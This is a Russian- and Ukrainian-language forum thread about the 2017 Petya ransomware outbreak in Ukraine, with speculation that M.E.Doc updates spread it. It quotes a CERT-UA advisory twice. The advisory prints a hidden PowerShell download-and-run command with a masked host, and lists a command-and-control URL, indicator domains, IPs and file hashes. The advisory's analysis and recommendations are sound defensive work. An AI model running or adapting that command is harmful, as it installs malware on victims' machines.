Вирусы-вымогатели
- Автор теми Howl
- Дата створення
Андрюх@dp.ua
Пенсіонер
Bred, никто не мешает поместить этот файлик и в корень, и в Виндовс
Я именно так и сделал
Я именно так и сделалВирусная реклама рулит и продолжает поражать мозг читателей
Оригинал звучал пример так:
На месте создателей вируса я бы обязательно "пошутил" бы - при следующей атаке вируса модифицировал бы его так, что на компах с искусственно созданным таким файлом сумма выкупа бы сразу удваивалась и выскакивала бы дополнительная надпись: "Самый умный, да? Заплати и за прошлый раз"
Да.
У всех, но разработчики к этому не стремятся. Всё по принципу: "работает -- не трогай".
Если юзер лох - это ему не поможет, если толковый - обойдется и без этого.
Файлики создавать.. Завтра выйдет новая модификация Петруши, и будет проверять файл perfd.. Кто мог - уже заразился, главный способ прекратить эпидемию (да, да, именно в том масштабе, что сейчас грохнуло) - просто пофиксить МЕДОК! Ну и главное, конечно - надеемся на декриптор, уж очень много важных доков утеряно..
Мне кажется, ты излишне категоричен. Многие даже не слышавшие о нем организации вчера поймали подарок.
я бы не стал.
Учитывая то, что они в отказ ушли. А меня бух затероризировала - надави на админа, чтобы он комп включил, мне налоговые надо провести. Причем женщина неглупая и даже технически более чем подкованная, но не верит, что такая лажа из-за этой программы. Но все больше свидетельств в пользу этой версии. Поэтому я верю в вариант, что это один из путей распространения заразы.
Надо где-то на бухгалтерском форуме большими буквами написать "МЕДок зло" .
Кстати, взлом бухпроги - свидетельство в пользу того, что атака была инспирирована из РФ. Логика такая - какой софт есть в каждой компании? Операционка (самое легкое - винда, но даже ее так легко не вскроешь), офисный пакет (тоже самое), браузеры (аналогично), бухгалтерские проги (а вот тут можно покопаться). 1С не имеет механизма автоматического обновления, а вот медок - имеет, на него и сделали ставку. И дата - как раз под День конституции, подарочек
Добавлено через 1 минуту
А это уже традиционный путь заражения - через открывание непонятных вложений и/или ссылок.
Останнє редагування:
За даними CERT-UA переважна більшість інфікувань операційних систем відбувалася через відкриття шкідливих додатків (документів Word, PDF-файлів), які були надіслані на електронні адреси багатьох комерційних та державних структур.
Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл: [Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
Источник
Рекомендації щодо захисту комп’ютерів від кібератаки вірусу-вимагача (Оновлено)
Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл: [Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).
Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://ХХХ.ХХХ.ХХ.ХХХ/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/
Даний xls-файл виступав в якості завантажувача та містив в собі обфускований javascript код.
Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://ХХХХХ/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)
Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.
Командно-контрольний центр:
hххp://coffeinoffice.xyz:80/cup/wish.php
Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.
Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.
Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.
За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.
Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей
CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).
Перелік індикаторів компрометації:
84.200.16.242:80
french-cooking.com:443
coffeinoffice.xyz:80
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
Рекомендації CERT-UA:
Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.
Установити офіційний патч MS17-010.
На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.
В разі інфікування персонального комп’ютера не перезавантажувати систему.
Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.
Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://ХХХ.ХХХ.ХХ.ХХХ/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/
Даний xls-файл виступав в якості завантажувача та містив в собі обфускований javascript код.
Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://ХХХХХ/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)
Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.
Командно-контрольний центр:
hххp://coffeinoffice.xyz:80/cup/wish.php
Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.
Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.
Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.
За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.
Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей
CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).
Перелік індикаторів компрометації:
84.200.16.242:80
french-cooking.com:443
coffeinoffice.xyz:80
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
Рекомендації CERT-UA:
Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.
Установити офіційний патч MS17-010.
На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.
В разі інфікування персонального комп’ютера не перезавантажувати систему.
Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.
Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.
Рекомендації щодо захисту комп’ютерів від кібератаки вірусу-вимагача (Оновлено)
Tsa, і шо, такош прийшов Петя?
Если есть LAN, то грипп будет у всех без заплаток SMB.
Так, на 90+% робочих станцій. Третину юзера активно зашифрували, решта було вчасно вилікувано.
Перед цим були оновлення ОС з АД. Не інфіковані були лише ті ОС Windows що не отримали оновлення або не були в домені. Ну і звичайно юніксові сервери собі працюють. Але мережа відділень по всіх областях не працює і сьогодні.
Добавлено через 4 минуты
Pluse, самба як протокол у всіх відключен.
Перед цим були оновлення ОС з АД. Не інфіковані були лише ті ОС Windows що не отримали оновлення або не були в домені. Ну і звичайно юніксові сервери собі працюють. Але мережа відділень по всіх областях не працює і сьогодні.
Добавлено через 4 минуты
Pluse, самба як протокол у всіх відключен.
Останнє редагування:
По моим скромным наблюдениям (и админов более-менее крупных компаний) - грохнулись серваки и компы именно где был Медок и уже по сетевым шарам незакрытые в локалке. Клиентские компы, на которых шары не открыты - целые, т.е. почту юзера точно не открывали. Не буду говорить как единственный метод заражения, но поставил бы 1-е место.
Добавлено через 29 минут
Если ничего больше не остается - то можно только надеяться..
Да, бухи сильно давят, конец квартала, штрафы и т.д., ну я предупреждаю, дождитесь хоть завтра..
Останнє редагування:
сделай слепок диска и дай ей вести свои отчеты...потом можешь даже для профилактики откатиться из образаПо моим скромным наблюдениям (и админов более-менее крупных компаний) - грохнулись серваки и компы именно где был Медок и уже по сетевым шарам незакрытые в локалке. Клиентские компы, на которых шары не открыты - целые, т.е. почту юзера точно не открывали. Не буду говорить как единственный метод заражения, но поставил бы 1-е место.
Добавлено через 29 минут
Если ничего больше не остается - то можно только надеяться..
Да, бухи сильно давят, конец квартала, штрафы и т.д., ну я предупреждаю, дождитесь хоть завтра..
Ну да, медок, конечно медок!
http://prntscr.com/fp9dyz
http://prntscr.com/fp9dyz
Проверь s3000308.xsd здесь https://virustotal.com/ и покажи ссылку, плизз..
Malwarebytes дело конечно хорошее, но для этого Пети, которого еще вчера никто не определял - особого доверия не вызывает.
Malwarebytes дело конечно хорошее, но для этого Пети, которого еще вчера никто не определял - особого доверия не вызывает.